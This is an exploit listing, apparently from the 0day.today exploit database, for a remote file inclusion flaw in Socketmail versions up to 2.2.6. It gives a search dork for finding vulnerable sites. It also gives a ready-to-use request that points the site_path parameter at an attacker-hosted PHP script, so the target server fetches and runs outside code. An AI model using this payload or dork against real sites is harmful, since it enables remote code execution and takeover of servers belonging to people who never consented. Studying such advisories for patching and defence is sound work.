[ authorization ] [ registration ] [ restore account ]
Contact us
You can contact us by:
0day Today Exploits Market and 0day Exploits Database

Socketmail <= 2.2.6 (site_path) Remote File Include Vulnerability

Author
Aesthetico
Risk
[
Security Risk Unsored
]
0day-ID
0day-ID-445
Category
web applications
Date add
24-05-2006
Platform
unsorted
=================================================================
Socketmail <= 2.2.6 (site_path) Remote File Include Vulnerability
=================================================================



Title: Socketmail <= 2.2.6 - Remote File Include Vulnerability
-----------------------------------------------------------------
Vendor: Creative Digital Resources
URL: http://socketmail.com
-----------------------------------------------------------------

Credits:
Discovered by: 'Aesthetico'
http://www.majorsecurity.de
-----------------------------------------------------------------
Search for: "Powered by SocketMail"
-----------------------------------------------------------------

Exploitation(tested with Lite-Edition and Pro-Edition):

/index.php?site_path=http://www.yourspace.com/yourscript.php?




#  0day.today [2024-09-20]  #